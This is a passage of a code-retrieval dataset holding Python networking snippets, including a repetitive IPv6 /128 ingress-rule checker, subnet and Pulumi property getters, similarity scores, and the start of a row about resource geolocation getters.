type(ingress['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(ingress['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress['CidrIp']:\n return True\n\n elif ingress['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n if sys.version_info[0] < 3 and type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif hasattr(ingress, 'cidrIpv6'):\n\n if type(ingress.cidrIpv6) == type(str()):\n\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. 
if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress.cidrIpv6) == type(dict()):\n\n for item in ingress.cidrIp:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6[item]:\n return True\n\n elif ingress.cidrIpv6[item].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif type(ingress.cidrIpv6) == type(str()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n else:\n print('not sure what this is')\n print('need to fix')\n sys.exit(1)\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n for item in ingress:\n if 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n return True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress.cidrIpv6) == type(dict()):\n\n for item in ingress.cidrIp:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6[item]:\n return True\n\n elif ingress.cidrIpv6[item].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif type(ingress.cidrIpv6) == type(str()):\n\n # only care about literals. 
if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif sys.version_info[0] < 3 and type(ingress.cidrIpv6) == type(unicode()):\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return False\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n else:\n print('not sure what this is')\n print('need to fix')\n sys.exit(1)\n\n else:\n if debug:\n print('ip is: ' + str(ingress.cidrIpv6) + lineno())\n print('type: ' + str(type(ingress.cidrIpv6)) + lineno())\n\n if type(ingress.cidrIpv6) == type(list()):\n\n has_invalid_cidr = False\n\n for item in ingress.cidrIpv6:\n\n if debug:\n print('list item: ' + str(item) + lineno())\n\n if type(item) == type(dict()):\n\n for item2 in item:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item[item2]:\n return True\n\n elif item2 == 'Ref':\n return True\n\n elif item[item2].endswith(suffix):\n if debug:\n print('ip ends with /32' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /32' + lineno())\n return False\n\n elif 'CidrIp' in item:\n if type(item['CidrIp']) == type(str()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n has_invalid_cidr = True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n has_invalid_cidr = False\n\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n has_invalid_cidr = True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n has_invalid_cidr = False\n\n return has_invalid_cidr\n\n else:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return True\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress) == type(str()):\n if debug:\n print('is a str ' + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress:\n return True\n\n elif ingress.endswith('/128'):\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif sys.version_info[0] < 3 and type(ingress) == type(unicode()):\n if debug:\n print('is a str ' + lineno())\n\n # only care about literals. 
if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress:\n return True\n\n elif ingress.endswith('/128'):\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n return False",
"def get_mask_ipv6(bits):\n\n if bits > 128 or bits < 0:\n raise ValueError('A mask can only be 0-128 bits, got %i' % bits)\n elif bits == 128:\n return FULL_IPv6_MASK\n\n # get the binary representation of the mask\n mask_bin = _get_binary(2 ** bits - 1, 128)[::-1]\n\n # breaks it into sixteen character groupings\n groupings = [mask_bin[16 * i:16 * (i + 1)] for i in range(8)]\n\n # converts each group into its hex value\n return ':'.join(['%04x' % int(group, 2) for group in groupings]).upper()",
"def cidr(self):\n return self._cidr",
"def NoOfAddressPrefix(self):\n return self._get_attribute('noOfAddressPrefix')",
"def find_ipv6():\n\n test_host = '2600::' # Sprint.net\n try:\n with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as s:\n s.connect((test_host, 53))\n ipv6 = s.getsockname()[0]\n except:\n if cfg['debug']:\n print(\"Couldn't create a socket to %s\" % test_host)\n print(\"Check that you have a valid IPv6 default route\")\n ipv6 = None\n\n return ipv6",
"def network(self):\n address = unicode(\"%s/%s\" % (self.address, _get_cidr(self.netmask)))\n return IPv4Network(address, strict=False)",
"def allocation_min_netmask_length(self) -> pulumi.Output[Optional[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def get_ipv6_host(self, host):\n\n try:\n host = u'{0}'.format(host)\n return IPv6Network(host, strict=False)\n except ValueError as e:\n error_msg = \"Given host {0} is an invalid IPv6 format -- \" \\\n \"error {1}\".format(host, str(e))\n LOG.error(error_msg)\n self.module.fail_json(msg=error_msg)",
"def ipv6_native(self) -> bool:\n return pulumi.get(self, \"ipv6_native\")",
"def remote_ip_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ip_prefix\")",
"def remote_ip_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ip_prefix\")",
"def update_gateway_with_prefixlen(self, ipv4='', ipv4_prefixlen=0, \n ipv6='', ipv6_prefixlen=0, port_no=''):\n port = self.ports[port_no]\n\n if port.gateway is None:\n port.gateway = Gateway(name=port.name, port_no=port.port_no,\n ipv4=ipv4, ipv4_prefixlen=ipv4_prefixlen,\n ipv6=ipv6, ipv6_prefixlen=ipv6_prefixlen)\n else:\n port.gateway.name = port.name\n port.gateway.ipv4 = netaddr.IPAddress(ipv4)\n port.gateway.ipv4_subnet = netaddr.IPNetwork(ipv4 + '/' + str(ipv4_prefixlen))\n port.gateway.ipv6 = netaddr.IPAddress(ipv6)\n port.gateway.ipv6_subnet = netaddr.IPNetwork(ipv6 + '/' + str(ipv6_prefixlen))\n port.gateway.port_no = port.port_no\n\n self.tbl.update_entry(subnet=port.gateway.ipv4_subnet, receive_port=port, metric=0, source=\"CONNECTED\")",
"def alias(self):\n return 'IPv6-Opts'",
"def get_if_addr6(iff):\n return next((x[0] for x in in6_getifaddr()\n if x[2] == iff and x[1] == IPV6_ADDR_GLOBAL), None)",
"def ipv6_access_type(self) -> Optional[pulumi.Input['IPAllocationPolicyIpv6AccessType']]:\n return pulumi.get(self, \"ipv6_access_type\")",
"def allocation_min_netmask_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def allocation_min_netmask_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def is_ipv6(cluster_config):\n cluster = load_cluster_config_json(cluster_config)\n return cluster[\"environment\"][\"ipv6_enabled\"]",
"def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )",
"def subnetting(self):\n ip = netaddr.IPNetwork(addr=self.subnet)\n subnets = list(ip.subnet(prefixlen=24))\n list_subnets = [str(subnet) for subnet in subnets]\n return list_subnets",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")"
] | [
"0.7729275",
"0.76980174",
"0.76423615",
"0.76423615",
"0.7312516",
"0.6983688",
"0.6952086",
"0.69470865",
"0.6910834",
"0.6910834",
"0.6771784",
"0.65345484",
"0.6393636",
"0.6392489",
"0.634702",
"0.6326751",
"0.6292675",
"0.6250887",
"0.62504554",
"0.6245007",
"0.6242389",
"0.62111634",
"0.61639744",
"0.6129926",
"0.61279005",
"0.6124118",
"0.6123404",
"0.6011149",
"0.6000404",
"0.59922934",
"0.5961852",
"0.59380776",
"0.59224266",
"0.5904247",
"0.58965254",
"0.5884845",
"0.5841586",
"0.5811044",
"0.57858795",
"0.57753503",
"0.57629985",
"0.57561666",
"0.5749286",
"0.57438874",
"0.572851",
"0.5718094",
"0.57133394",
"0.57131594",
"0.570418",
"0.5700854",
"0.5697253",
"0.5693369",
"0.56607217",
"0.56362534",
"0.5634834",
"0.5634834",
"0.56252795",
"0.5624694",
"0.5611572",
"0.5611493",
"0.5585948",
"0.55839694",
"0.55762595",
"0.557162",
"0.55490845",
"0.55462766",
"0.5541481",
"0.55411285",
"0.5517764",
"0.55050266",
"0.5475352",
"0.54672366",
"0.54544413",
"0.5450409",
"0.54385674",
"0.54139763",
"0.54112065",
"0.53973544",
"0.5391061",
"0.5383078",
"0.5383049",
"0.5382081",
"0.5379691",
"0.53760344",
"0.5375599",
"0.5375143",
"0.53591913",
"0.53409517",
"0.5304832",
"0.5304832",
"0.5301838",
"0.5299387",
"0.52880913",
"0.52783364",
"0.52632976",
"0.52632976",
"0.5260236",
"0.5252007",
"0.5245292",
"0.52389383"
] | 0.74332094 | 4 |
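The row above pairs the IPv6-prefix docstring with a Pulumi output-property getter. As an illustrative aside, not taken from the provider SDK or from this dataset, the sketch below shows how the documented constraint — an IPv6 CIDR is required when the IP allocation type is IPV6 or DualStack — could be checked with the standard-library ipaddress module; the helper name and argument names are assumptions, while "IPV6" and "DualStack" come from the docstring quoted in the row.

    from typing import Optional
    import ipaddress

    def check_ipv6_connected_prefix(ip_allocation_type: str, prefix: Optional[str]) -> Optional[str]:
        # Hypothetical helper: enforces the rule stated in the docstring above.
        if ip_allocation_type in ("IPV6", "DualStack"):
            if not prefix:
                raise ValueError("ipv6_connected_prefix is required for IPV6/DualStack allocation")
            # Raises ValueError if the string is not a valid IPv6 network in CIDR notation.
            ipaddress.IPv6Network(prefix, strict=False)
        return prefix

    # Example: check_ipv6_connected_prefix("DualStack", "fd00:1234::/64") returns the prefix unchanged.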
The name of the L3 network. | def l3_network_name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "l3_network_name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def network(self) -> str:\n return pulumi.get(self, \"network\")",
"def computer_network_name(self) -> str:\n return self._computer_network_name",
"def network_name(self, **kwargs):\n\n return self.api_request(self._get_method_fullname(\"network_name\"), kwargs)",
"def name(self) -> str:\n return f\"{self._inst} NAT {self._data['name']}\"",
"def managed_network_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"managed_network_name\")",
"def layer_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"layer_name\")",
"def get_name():\n\n return 'nettools'",
"def network(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network\")",
"def layer_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"layer_name\")",
"def cloud_services_network_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cloud_services_network_name\")",
"def network(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"network\")",
"def get_name(self):\n name_str = \"Brain\"\n name_str += \"_\" + self._memory.get_name() \n name_str += \"_ImgSize\" + str(self._img_size[0])\n name_str += \"_Nov\" + self._novelty_loss_type.upper()\n name_str += \"_Train\" + str(self._train_epochs_per_iter)\n name_str += \"_Lrate\" + str(self._learning_rate)\n return name_str",
"def __str__(self):\n\n return \"Network: {0}\".format(self.topology)",
"def layer_protocol_name(self) -> str:\n return self._layer_protocol_name",
"def nw_name(self):\n return self._nw_name",
"def get_network_name(self): # type: () -> str\n networks = self.get_network_names()\n\n if not networks:\n raise ApplicationError('No network found for Docker container: %s.' % self.id)\n\n if len(networks) > 1:\n raise ApplicationError('Found multiple networks for Docker container %s instead of only one: %s' % (self.id, ', '.join(networks)))\n\n return networks[0]",
"def get_network_name_on_vc(options):\n network = get_network_on_vc(options)\n if network:\n return network.name",
"def layer_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"layer_name\")",
"def name(self):\n return 'VL53L1X'",
"def get_node_name(self):\n return util.join_names_underscore(self.name, str(self.as_pointer()))",
"def get_network(self) -> Optional[str]:\n return self.get_value(self._network_attribute)",
"def name(self):\n return utf82unicode(pn_link_name(self._impl))",
"def get_network_name(options):\n user = pwd.getpwuid(os.getuid())[0]\n return \"%s-%s\" %(user, options.name)",
"def _get_l3_label(self):\n return self.__l3_label",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def network_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_id\")",
"def name(self) -> str:\n return self._alias or f\"Nut-{self._host}\"",
"def network_watcher_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"network_watcher_name\")",
"def getName(self):\n return _libsbml.XMLTriple_getName(self)",
"def get_name(self):\n \n return 'Loop-Back'",
"def name(self) -> str:\n return self.proto.name",
"def name(self) -> 'Literal[\"Dynamic Reverse Address Resolution Protocol\", \"Inverse Address Resolution Protocol\", \"Reverse Address Resolution Protocol\", \"Address Resolution Protocol\"]': # pylint: disable=line-too-long\n return self._name",
"def name(self):\n return 'n' + self._name\n # if self.children:\n # return 'fossil_' + self._name\n # else:\n # return 'society_' + self._name",
"def name_network(opt):\n optim = opt['optimizer'].__name__\n\n nn_tuple = (opt['method'], opt['upsampling_rate'],\n 2*opt['input_radius']+1,\n 2*opt['receptive_field_radius']+1,\n (2*opt['output_radius']+1)*opt['upsampling_rate'],\n optim, str(opt['dropout_rate']), opt['transform_opt'],)\n nn_str = '%s_us=%i_in=%i_rec=%i_out=%i_opt=%s_drop=%s_prep=%s_'\n nn_tuple += (opt['cohort'], opt['no_subjects'],\n opt['subsampling_rate'], opt['patchlib_idx'])\n nn_str += '%s_TS%i_Subsample%03i_%03i'\n\n return nn_str % nn_tuple",
"def get_name(self):\n \n return 'Socket/IP'",
"def name(self):\n if self.resource.is_client:\n return f\"{self.network.name} {self.resource.name_connection_type} {SWITCH_TYPES[self.variable][0]}\"\n elif self.resource.is_eero or self.resource.is_profile:\n return f\"{self.network.name} {self.resource.name} {SWITCH_TYPES[self.variable][0]}\"\n return f\"{self.resource.name} {SWITCH_TYPES[self.variable][0]}\"",
"def name(self):\n return self.device.get_station_name(self.station_number)",
"def private_network(self) -> str:\n return pulumi.get(self, \"private_network\")",
"def topology_name(self):\n return self._topology_name",
"def node_name(self):\n return self._node_name",
"def name(self):\n return self.proto.name",
"def get_name(self):\n return self.nvPublic.get_name()",
"def network_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"network_id\")",
"def name(self):\n return s.GLPK",
"def __str__(self):\n return ('NodesNetwork('\n f'uris: {self.uris.array}, '\n f'sockets: {self.sockets.array})')",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def cluster_name(self) -> str:\n return pulumi.get(self, \"cluster_name\")",
"def _get_layer_name(self, layer):\n label = '{}-{}'.format(layer.label, layer.rank)\n if label not in self.naming_map:\n self.naming_map[label] = {}\n\n if layer not in self.naming_map[label].keys():\n self.naming_map[label][layer] = len(self.naming_map[label]) + 1\n return '{}-{}'.format(label, self.naming_map[label][layer])",
"def subnetwork_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subnetwork_name\")",
"def name(self):\n return self._light.name",
"def _get_network(name):\n\n if name not in _NAME_TO_NETS:\n raise ValueError('Network name [%s] not recognized.' % name)\n return _NAME_TO_NETS[name].model",
"def __str__(self):\n return 'InteractingNetworks:\\n' + Network.__str__(self)",
"def get_network(self):\n return self.get_ip_network()[-1]",
"def name(self):\n return self.attributes.workspace.name",
"def name(self):\n return self.mesh.name",
"def name(self):\n return self.mesh.name",
"def cluster_name(self):\n return self.name",
"def chain_name(self) -> str:\n return pulumi.get(self, \"chain_name\")",
"def name(self) -> str:\n station_name = self._get_station_name()\n return f\"{station_name} {self._fuel_type}\"",
"def name(self):\n return 'Greenlet-%d' % (self.minimal_ident,)",
"def name(self):\n return self.viztrail.name",
"def namespace_show_name(self) -> str:\n return pulumi.get(self, \"namespace_show_name\")",
"def name(self):\n return self.prefix",
"def returnNetworkNode(self):\n\n networkNodes = cmds.ls(type=\"network\")\n for node in networkNodes:\n attrs = cmds.listAttr(node)\n if \"moduleName\" in attrs:\n if cmds.getAttr(node + \".moduleName\") == self.name:\n networkNode = node\n\n return networkNode",
"def get_name(self):\n \n return 'UDP/IP Server'",
"def name(self) -> Text:\n\n return \"5knn_state\"",
"def node_name(self) -> str:\n return typing.cast(\n str,\n self._properties.get(\"nodeName\"),\n )",
"def network(self):\n return self.__network",
"def _generate_node_name(self):\r\n while 1:\r\n name = \"node\" + str(self._name_sequence)\r\n if name not in self.nodes.keys():\r\n break\r\n self._name_sequence += 1\r\n\r\n return name",
"def getDatabaseName(self):\n return f\"n{self.name.capitalize()}\"",
"def name(self):\n return self._scene_name",
"def vnet_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"vnet_name\")",
"def name ( self ) :\n return self.__name if self.__name else ''",
"def node_name(self) -> str:\n op_name = f\"{self.name.name}_{self.name.overload_name}\".lower()\n return \"\".join(word.capitalize() or \"\" for word in op_name.split(\"_\"))",
"def read_name(self):\n return self.node.read_name()",
"def read_name(self):\n return self.node.read_name()",
"def read_name(self):\n return self.node.read_name()",
"def read_name(self):\n return self.node.read_name()",
"def get_name(cls):\n\t\treturn '' if cls is SAM3X else cls.__name__",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")",
"def name(self) -> str:\n return pulumi.get(self, \"name\")"
] | [
"0.6955331",
"0.6824133",
"0.6799091",
"0.6677395",
"0.66031",
"0.6491807",
"0.6462104",
"0.64592564",
"0.64398986",
"0.63908404",
"0.63872564",
"0.638713",
"0.63722634",
"0.6359511",
"0.6331267",
"0.63089246",
"0.62042356",
"0.6186131",
"0.61773044",
"0.61605525",
"0.6082077",
"0.60543025",
"0.60192996",
"0.6005461",
"0.59952414",
"0.59952414",
"0.59952414",
"0.5986967",
"0.59714127",
"0.5953963",
"0.5936222",
"0.59344983",
"0.59284234",
"0.5901047",
"0.58911264",
"0.58861",
"0.5869498",
"0.58619165",
"0.5854023",
"0.58530134",
"0.58390796",
"0.583566",
"0.58315986",
"0.58186805",
"0.5816096",
"0.58026093",
"0.57839316",
"0.57839316",
"0.57821304",
"0.5781985",
"0.57736707",
"0.57704574",
"0.57435584",
"0.57235163",
"0.5716776",
"0.5704344",
"0.5704344",
"0.5703192",
"0.5695342",
"0.56767225",
"0.567448",
"0.5673451",
"0.5667695",
"0.5648024",
"0.5634939",
"0.56264967",
"0.56222385",
"0.56209815",
"0.5615781",
"0.5612387",
"0.5579998",
"0.557467",
"0.55710113",
"0.55576307",
"0.5551923",
"0.5547658",
"0.5547658",
"0.5547658",
"0.5547658",
"0.5539167",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228",
"0.5538228"
] | 0.88098806 | 0 |
The geolocation where the resource lives | def location(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "location") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_location(self):\n\t\treturn self.location",
"def get_location(self):\n return self.location",
"def get_location(self):\n return self.location",
"def get_location(self):\r\n return self.__location",
"def get_location(self):\r\n return None",
"def getLocation(self):\n return self._Location",
"def geolocation(self):\n return self.get_property('geolocation', GeolocationColumn())",
"def location(self):\n return self.geometry.location",
"def location(self):\n self.manager.refresh_client()\n return self.content[\"location\"]",
"def location(self):\n return self._location",
"def location(self):\n return self._location",
"def get_current_locate(self) -> dict:\r\n geolocate: dict = self.gmaps.geolocate()\r\n return geolocate",
"def geolocation(self):\n if self.latitude and self.longitude:\n return self.longitude, self.latitude",
"def Lokation(self):\n return self.getMylocation()",
"def location(self):\r\n return self._get('location', {})",
"def get_location(self) -> tuple:\n return self.__location",
"def location(self) -> object:\n return self._location",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def getLocation(self):\n send_url = 'https://ipinfo.io'\n r = requests.get(send_url)\n resp = json.loads(r.text)\n logging.info(\"GeoLoc: {}\".format(resp))\n return resp",
"def location(self):\n return self.properties.get(\"location\", Location())",
"def geo(self):\n return self.query.geo",
"def location(self) -> Object:\n return self._location",
"def locate(self):\n if self.location == '':\n return None\n if self.coords is not None:\n return self.coords\n\n loc = urlencode({'address': self.location})\n urldoc = urlopen(User._GMAP_URL.format(query=loc))\n jsObj = json.loads(urldoc.readall().decode('utf-8'))\n if len(jsObj['results']) > 0:\n # discard commercial results\n locTypes = jsObj['results'][0]['address_components'][0]['types']\n if not 'premise' in locTypes and not 'route' in locTypes and not 'establishment' in locTypes and not 'subpremise' in locTypes:\n self.coords = jsObj['results'][0]['geometry']['location']\n return self.coords\n # still here? it's all rubbish\n return None",
"def get_location(self):\n return self.request({\n \"path\": \"/\" + UUID + \"/location\"\n })",
"def m_location_get(self) -> Point:\n pass",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def get_current_location(self):\n return self.enu_2_local()",
"def location(self) -> str:\n return self._location",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def get_location(self) -> models.Location:\n return models.Location.get(region=self, name=self.name, deleted=False)",
"def get_location(self) -> Union[str, None]:\n return self._get_location()",
"def location(self) -> str:\n return self.metadata.location",
"def get_location(self):\r\n response = self.connection.make_request('GET', self.name,\r\n query_args='location')\r\n body = response.read()\r\n if response.status == 200:\r\n rs = ResultSet(self)\r\n h = handler.XmlHandler(rs, self)\r\n xml.sax.parseString(body, h)\r\n return rs.LocationConstraint\r\n else:\r\n raise self.connection.provider.storage_response_error(\r\n response.status, response.reason, body)",
"def location(self):\n if \"location\" in self._prop_dict:\n if isinstance(self._prop_dict[\"location\"], OneDriveObjectBase):\n return self._prop_dict[\"location\"]\n else :\n self._prop_dict[\"location\"] = Location(self._prop_dict[\"location\"])\n return self._prop_dict[\"location\"]\n\n return None",
"def get_relative_location(self):\n http = urllib3.PoolManager()\n url = 'http://ipinfo.io/json'\n response = http.request('GET', url)\n soup = BeautifulSoup(response.data, features=\"html5lib\")\n soup = str(soup).split(\"body\")[1][1:-2]\n try:\n soup = ast.literal_eval(soup)\n self.ip_addr = soup['ip']\n self.location = soup['loc']\n except Exception as e:\n print(\"Approximate address can not be determined...\")\n self.ip_addr = None\n self.location = None",
"def cal_location(self):\n return self.location.name",
"async def location(self):\n if not hasattr(self, \"_location\"):\n self._location = await Stack.fetch_stack_value(self, \"http://usefulinc.com/ns/doap#location\", await self.uuid)\n return self._location",
